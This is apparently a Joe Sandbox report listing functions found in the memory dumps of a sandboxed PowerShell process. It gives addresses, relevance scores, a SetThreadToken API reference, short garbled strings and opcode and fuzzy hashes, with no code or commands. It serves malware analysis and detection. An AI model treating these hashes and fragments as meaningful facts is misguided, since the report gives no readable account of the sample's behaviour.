Function 07DF3CE8 Relevance: 5.6, Strings: 4, Instructions: 576
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 07DF4030
4'^q, xrefs: 07DF418A
4'^q, xrefs: 07DF4026
4'^q, xrefs: 07DF4180

Memory Dump Source

Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 76246f5be5d55e626b6d97a8ef77d631be6c7d1eb622a8faec24328d5ae3ae58
Instruction ID: 328bb98cda63333b3c8cfffc1739f2e889969d97771017a4fa5ad63e2311aaed
Opcode Fuzzy Hash: 76246f5be5d55e626b6d97a8ef77d631be6c7d1eb622a8faec24328d5ae3ae58
Instruction Fuzzy Hash: 671256F1B002499FCB249B68D81076BFBA2AFC1311F26847ADA45CF395DB31C895C7A1

Function 08F66A52 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 08F66ABA

Memory Dump Source

Source File: 00000016.00000002.1866933715.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_8f60000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 9a49679a54bb933f44855cf0238f6082e305ca4d898f0fe405a1708856cb2b78
Instruction ID: 95223e0c8f953c18223f37f7527be50ea328e44aa89497264deca8c2311986d6
Opcode Fuzzy Hash: 9a49679a54bb933f44855cf0238f6082e305ca4d898f0fe405a1708856cb2b78
Instruction Fuzzy Hash: 0D1116B59002588FDB10CFA9D544BDEFFF4EB49320F248559D459A7210C775A944CFA4

Function 08F66A58 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 08F66ABA

Memory Dump Source

Source File: 00000016.00000002.1866933715.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_8f60000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: f0e0f824936908a93964386f90b2e3932b7db733b98862e22dcafd016fcaff94
Instruction ID: 897fe1d6eaad1549245bddb8993578e05dab09f6c15a36b4b539f393777c64c2
Opcode Fuzzy Hash: f0e0f824936908a93964386f90b2e3932b7db733b98862e22dcafd016fcaff94
Instruction Fuzzy Hash: 131106B59002198FDB10DF9AC544BDEFBF8EB48324F248419D459A7310D779A944CFA5

Function 04F26FE0 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 04F27105

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: ddbb3c2b4126aa7ff999eed93444990b2461095447497befbd9be7953bf7115d
Instruction ID: 796ef42765fa7eaeda9808340dc060fe2678401038ae48e99206b1bd7cfe79e2
Opcode Fuzzy Hash: ddbb3c2b4126aa7ff999eed93444990b2461095447497befbd9be7953bf7115d
Instruction Fuzzy Hash: 7D413C34B042558FDB04DFA9C568AAEBBF1EF8D311F144098E442AB395DB35EC46CB61

Function 04F2AF98 Relevance: 1.3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&^q, xrefs: 04F2AFBA

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID: (&^q
API String ID: 0-2067289071
Opcode ID: 3b320972de62864f5cdef9b0c869ff271f9fa857eae5d24ab7bc0a0a31de5f3a
Instruction ID: 8c0279adb61818aa688d769ac917a463e5b115aa56da968bbf1cd4f2cee8a2f9
Opcode Fuzzy Hash: 3b320972de62864f5cdef9b0c869ff271f9fa857eae5d24ab7bc0a0a31de5f3a
Instruction Fuzzy Hash: E321D171E042588FCB14DFAED4007AEBFF5EB88320F14846AD458A7340CA75A805CFA5

Function 04F229F0 Relevance: .2, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e279b70a9a451a481fd209ad3bc87f72362fae80fb6120a8ddd9ea01aee33dba
Instruction ID: ae2407a51480893bc0e79adccb2dd831d3d0c27e357094e41ed4b289fbe97b99
Opcode Fuzzy Hash: e279b70a9a451a481fd209ad3bc87f72362fae80fb6120a8ddd9ea01aee33dba
Instruction Fuzzy Hash: D191ACB4A002159FCB15CF59C5849AEFBB1FF88310B258699E815AB365C736FC52CFA0

Function 04F2BAC0 Relevance: .2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9ebcf4e5fd82f4077fda4a5d9b948e536df6c1f3cc1ac9a2c6ea60a53a3c27
Instruction ID: 261d1fec791a49874e2cdf34e4e47bffe092a3f1d7b05c684ec2d7e1cdff290c
Opcode Fuzzy Hash: fa9ebcf4e5fd82f4077fda4a5d9b948e536df6c1f3cc1ac9a2c6ea60a53a3c27
Instruction Fuzzy Hash: EB612871E002188FDB14DFA9D684A9DFBF1EF88310F148169E819AB355EB74AC85CB60

Function 04F2BAB0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5aaf6e9b6c126649643462771f6b712b98480439b8a2c8975586739fa8777a
Instruction ID: 16a0e0b5377e07430a6808a6e70db9dc12b4c24e9deb427b7a13491122bf1eb1
Opcode Fuzzy Hash: ba5aaf6e9b6c126649643462771f6b712b98480439b8a2c8975586739fa8777a
Instruction Fuzzy Hash: 87512771E00258CFCB15DFA9D584A9DBBF1EF88310F148069E819AB365EB74A885CF51

Function 07DF3CCC Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07227e954525202605c785aa449ff2d7e9b1a8712b7dc7ff2b8f93d79a43546d
Instruction ID: 22469e893a6fd867428bccd8e4142b252258d93d8013a37ffa15c94a3ee7453b
Opcode Fuzzy Hash: 07227e954525202605c785aa449ff2d7e9b1a8712b7dc7ff2b8f93d79a43546d
Instruction Fuzzy Hash: EF4115F1A00206DFCB249B24C901B6BFBA2AF80744F1B85AADA049F295D735DD54C7A1

Function 04F22B00 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f11864a21b5b1b6cec700148d4453e01efef3f74c9c98b943de2057e862e9bef
Instruction ID: d519e8f47260eb6d9249dc5182f630c2a274fe283c5f136e60d4009d81a19707
Opcode Fuzzy Hash: f11864a21b5b1b6cec700148d4453e01efef3f74c9c98b943de2057e862e9bef
Instruction Fuzzy Hash: 61413AB4A005159FCB09CF59C5989AEFBB1FF48310B128699D815AB364C736FC52CFA0

Function 04F2C388 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199bf84c0ad1e8096c98d961b4962256f58044f4913300a3fc076b7075797f26
Instruction ID: 436a658121462849ff5217c9bc08d4b077b9ea0c37ffe4f9c9ad3c0ba86c00e1
Opcode Fuzzy Hash: 199bf84c0ad1e8096c98d961b4962256f58044f4913300a3fc076b7075797f26
Instruction Fuzzy Hash: 5E317E313006109FD709EB78D954A6EB792EFC4315F008539D60ACB365DF71A846CBA1

Function 04F27740 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29ac85c3ead7e576166fcd212c07bda1da7601254047daf42ecb6274dda4e2c
Instruction ID: 4db36c9e03a96e4a822cfcd633b5c0a70b760b38bf88e455ce8799eccfb3d55c
Opcode Fuzzy Hash: d29ac85c3ead7e576166fcd212c07bda1da7601254047daf42ecb6274dda4e2c
Instruction Fuzzy Hash: 2031CC317002129FD714EB79DA54B6AB7E6EF88248F258479D409DB351EB35FC02CBA0

Function 04F26FDB Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c282db9fc739c4a3dc2ecc4b1764a75eacfc88ae52d55d362af973e4476f6763
Instruction ID: 1768de8f6749d827cf917a155650e2dd0077458c855fe54532759d47b2cef70f
Opcode Fuzzy Hash: c282db9fc739c4a3dc2ecc4b1764a75eacfc88ae52d55d362af973e4476f6763
Instruction Fuzzy Hash: F5310A34B001158FCB14DFA9D5A8AAABBF1EF8D315F1450A8E442AB355DB35EC46CF60

Function 04F2AE60 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11b2aab575f05e08ccf2d298d7e2fed27a7a1da52f4d3faadacd6e8862da9d8
Instruction ID: a65ec6d1d4c1970e83ee18fc1a5187bf9dbe3c4afe657040d1898aab29801bf8
Opcode Fuzzy Hash: b11b2aab575f05e08ccf2d298d7e2fed27a7a1da52f4d3faadacd6e8862da9d8
Instruction Fuzzy Hash: AE318F70E002198FDB08DFA9D6947AEBBF6EF89310F148069E405EB355EB349C428F91

Function 04F2AE70 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6793c5a55ffff472058421e88aa3f900c0ff4ad2dbf7dcd30593db340538b4e0
Instruction ID: 65f8dc67fa0e61b82fb21e29f3fb6d5872370f45c9b9d31a77c5efa2abba2be7
Opcode Fuzzy Hash: 6793c5a55ffff472058421e88aa3f900c0ff4ad2dbf7dcd30593db340538b4e0
Instruction Fuzzy Hash: E9316F70E006198FDB08DFA9D6947AEBBF6EF88310F148069E505E7354EB349C428FA1

Function 04F2E049 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648b5eea69f47f6767656c6b5d528121b990632ffda6e0f207c56912c9f00c28
Instruction ID: 8ed5df1f27ce6f23897da118711739114d82ec5e3197bc6503bf0e6b973997a5
Opcode Fuzzy Hash: 648b5eea69f47f6767656c6b5d528121b990632ffda6e0f207c56912c9f00c28
Instruction Fuzzy Hash: BA314734A002048FCB14DF69D4A8AAEBBF2EB89215F144169D406E7391DF75AC86CF90

Function 04F2AD28 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02eb022fdfadde8c02feafc3ec1cf64b586bd340c5c1b7589567b520072e0392
Instruction ID: 49e1396e12eca6538da78a51e62cbc8a3e647e17ddbef3305f910a7ce5862a55
Opcode Fuzzy Hash: 02eb022fdfadde8c02feafc3ec1cf64b586bd340c5c1b7589567b520072e0392
Instruction Fuzzy Hash: 093195B4F002099FEB04DFA4D854BBE7BB2EF84304F118479C515AB395DA38AD418F61

Function 04F2E058 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f88eb86e2ca60c0151b022cb7394f97e3d384ed5dbbeb07517f27f8520190b4
Instruction ID: 9be0047e8b960bf127dcd27e74f5f1f233eb89000ef5cff27659f2d1290fde07
Opcode Fuzzy Hash: 1f88eb86e2ca60c0151b022cb7394f97e3d384ed5dbbeb07517f27f8520190b4
Instruction Fuzzy Hash: 0A312630B002148FCB14DF69D598AAEBBF2EF88215F144069E406E7391DF75AC85CB91

Function 04F2AD38 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9932887daddb5fc2fc37070c232384d5272d3bed563aee5dc0e0ae20daef7e50
Instruction ID: ecfc9ec2c3d4b390a2df4ae2cfde41934bbbfde3dac6904fd9d1d50027fcefcd
Opcode Fuzzy Hash: 9932887daddb5fc2fc37070c232384d5272d3bed563aee5dc0e0ae20daef7e50
Instruction Fuzzy Hash: A03152B4F002099FEB04EFA4D954ABEB7B2EF84304F118468D515AB394DA39AD418FA1

Function 04DDF3D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7ebe740ddf658551aa11e7a268489c2d2a22af62df3b70586eaa4fcc05ed28
Instruction ID: 57d7531377d7208d0ac90d21d8fa17375e491ea5a6368505cd28b8c0609bd392
Opcode Fuzzy Hash: 5c7ebe740ddf658551aa11e7a268489c2d2a22af62df3b70586eaa4fcc05ed28
Instruction Fuzzy Hash: 05210372600200EFCF05DF54D9C0B26BFA5FB88314F24C5ADE94A4B256C73AE45ACBA1

Function 07DF2700 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eceafbc5bbe33bb63960098fe2ce50cfca62149e72894a1778d5a115b8590cb
Instruction ID: 8fd810e394abb48d7e0503a47f10121989d2b940f60766635dbcaaa9d9d9f7a2
Opcode Fuzzy Hash: 8eceafbc5bbe33bb63960098fe2ce50cfca62149e72894a1778d5a115b8590cb
Instruction Fuzzy Hash: B921B0B5A0020ADFDB20CF59C545B6EFBE0BB05321F06D066EA889B250C334F984CBA1

Function 04F293F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e4c655a23dbbde8ff756bb22db27b5e9784de0519d615fffbcd5d065809e15
Instruction ID: e7d4631d2d787b006ff01948735bcce7e38ae85916adab5b2f1ddda6f088b8a3
Opcode Fuzzy Hash: a8e4c655a23dbbde8ff756bb22db27b5e9784de0519d615fffbcd5d065809e15
Instruction Fuzzy Hash: D5318DB0E067448EDB60CF6AC5887DABFF2EF89310F28C05ED44D97215D6B46482CB61

Function 04DDF02C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91286054bf8124618c7168b28f84348e760022b61bf088dcb80a7689c251311
Instruction ID: b519cb94e8970d46024c7663973d77599453399ae689fa180d26caaf55208814
Opcode Fuzzy Hash: a91286054bf8124618c7168b28f84348e760022b61bf088dcb80a7689c251311
Instruction Fuzzy Hash: EE212675704240DFCB14DF24D9C4B26BFA5FB88314F24C56DDA4A4B356C33AE44ACA61

Function 04F29400 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb3ecd5ffaa29a6ba498c2e7d1eb8d745932ab72be7db9b083e5dc657a3ef43
Instruction ID: 74bd4657e7b9115c42a20a7905af8d566c2bfd2b1934792cd5c5349c4f9c7145
Opcode Fuzzy Hash: 9fb3ecd5ffaa29a6ba498c2e7d1eb8d745932ab72be7db9b083e5dc657a3ef43
Instruction Fuzzy Hash: C7216BB1E017448EEB60CF6AC58878AFBF2EB88310F28C41ED84D97245D6B46481CB61

Function 04F27848 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e5a357f2c88d30b3b983dc86a453a1b166de844b4d2dc47811d3f1bf30b2ac
Instruction ID: e04871da0affb2dfed103ed75c03fc4e796c41230119ae910a38bf586346de07
Opcode Fuzzy Hash: 75e5a357f2c88d30b3b983dc86a453a1b166de844b4d2dc47811d3f1bf30b2ac
Instruction Fuzzy Hash: A21170357002158FDB049F69E984EAA7BEAFFC8720724056AE509C7395DF31EC42CBA0

Function 04F2767C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23050b307554a948f5eb8af39276e349acd243a5a7a0775fcfa0359f7130dd75
Instruction ID: 4a912663d6086233a8836aa8fa46138388d743f4043e5fdbf5860c3561c3a5a9
Opcode Fuzzy Hash: 23050b307554a948f5eb8af39276e349acd243a5a7a0775fcfa0359f7130dd75
Instruction Fuzzy Hash: 62112E36B00119CFCB04DFA8D9449DD77F6EBCC225B0440A9E909EB324DB35ED068BA0

Function 04DDF3D3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction ID: 5da2f0c2c314297423eab707abf8f86a1c16ff8e8d359889cf140501eb6f6e23
Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
Instruction Fuzzy Hash: 90218C76504240DFCB06CF10D9C4B16BF72FB88314F24C5ADD9494A656C33AE46ACB91

Function 04DDF027 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
Instruction ID: 630e5d6ee5433ca1fea6193a6a799a042dba920acc18873a61db7e4399a276f5
Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
Instruction Fuzzy Hash: 1A119075504280DFDB15CF14D9C4B25BFA1FB84318F24C6AED94A4B656C33AE44ACB51

Function 04F2BCE0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c77a4abb533ffcef9093e64b8bbaf292f64eb9bf73d0a2c06be0967da356c3
Instruction ID: 6769ae4926c44f25de3018c8e98a562751667e9356b18b80cdb01b7d71df6008
Opcode Fuzzy Hash: 75c77a4abb533ffcef9093e64b8bbaf292f64eb9bf73d0a2c06be0967da356c3
Instruction Fuzzy Hash: A301D2316083949FD719CF79D994AA67FF0EF46210F1844EED49ACB6A2CA60F845CB01

Function 04F2DC98 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bc121f3f0b89adf9d7581704663495e66e6e8e5e27d0a2bc4ace99f23a4c935
Instruction ID: 71e6938388bb7b9c1c61df0d45288cddebcf1ebe176f80114ea6801e741973eb
Opcode Fuzzy Hash: 1bc121f3f0b89adf9d7581704663495e66e6e8e5e27d0a2bc4ace99f23a4c935
Instruction Fuzzy Hash: C011F3742047508FC728DF75D08186ABBF6EF8931532489ADD08A8B7A0DB36E842CB50

Function 04F2DF20 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e219a5d55a0faf8ffcbc72881724f226a9238b99d8ff495ee752a9ace7afcc31
Instruction ID: 7ffeb688f1ecb56ede9d23d0d76a3a8859c9c50a47995fd65a198683ae2f1c7e
Opcode Fuzzy Hash: e219a5d55a0faf8ffcbc72881724f226a9238b99d8ff495ee752a9ace7afcc31
Instruction Fuzzy Hash: 8501B535B04214DFCB15AFB4E908AAEBBF6FB89315F00406DE51AD3342DB329912CB90

Function 04DDD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0bc12b6b2bfc17973b8f2d0524710e98541accbcd905d9eca33ef08a802551d
Instruction ID: 1f119e946377e81e82142f89889a678be70aae4cc410bc5d344e5b1d11daa97b
Opcode Fuzzy Hash: d0bc12b6b2bfc17973b8f2d0524710e98541accbcd905d9eca33ef08a802551d
Instruction Fuzzy Hash: 8A012B312083009AEB108E25DD84B77FF9CEF81324F18C529EC480B146C679E841C6B1

Function 04DDD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0bf870559cbe02bf00ade25dac8b765129c89407ec92cb0ccc40cf09016994
Instruction ID: 95cd1fe052274f8b4d98c7ec1a2ca4404f5a648c3739b97a33457cfbda759d61
Opcode Fuzzy Hash: 4a0bf870559cbe02bf00ade25dac8b765129c89407ec92cb0ccc40cf09016994
Instruction Fuzzy Hash: 8501526110E3C05FD7128B259C94B62BFB4EF43224F1DC1DBD8888F1A3C2695845C772

Function 04F2BF10 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff720187ef2e7fb62a2531f7ab6d92613fb0992ac20ef3c6696b17e7e535bf8
Instruction ID: 93f72b69c82d7698a0c17cfe396bfab886ab4c0ce603378e3360c0b8b0e71cad
Opcode Fuzzy Hash: 7ff720187ef2e7fb62a2531f7ab6d92613fb0992ac20ef3c6696b17e7e535bf8
Instruction Fuzzy Hash: 4CF0A4357092A05FD7118B799C94ABB7FE9EB85610B0841AEF8D4C7352CA60C9049B60

Function 04DDD9A7 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1813897704.0000000004DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0f1be7e58fc06f380c6ae140c78ddcbd62830f54aa6aa6294e57f444c0af3a
Instruction ID: b869e5b4ca3fd7c183d6de50de24eb7d1a68186db702266f30734a9cb777034d
Opcode Fuzzy Hash: ae0f1be7e58fc06f380c6ae140c78ddcbd62830f54aa6aa6294e57f444c0af3a
Instruction Fuzzy Hash: 87F0F976200600AF9760CF0AD985C27FBADEBD5770719C55AE84A4B615C671FC41CEA0

Function 04F27964 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa2767820365272fd7aa69b6e69f242998e929a77ad876ade04ef69e827ace36
Instruction ID: a9df4758d5a93660ebbac054383ec0f8d499a0d03520de73f74397de398fa986
Opcode Fuzzy Hash: aa2767820365272fd7aa69b6e69f242998e929a77ad876ade04ef69e827ace36
Instruction Fuzzy Hash: 7AF089717006145FD710DA69D8449BF7BE5EB89275710092DE14AD3350CE75AC468B60

Function 04F2DEC1 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

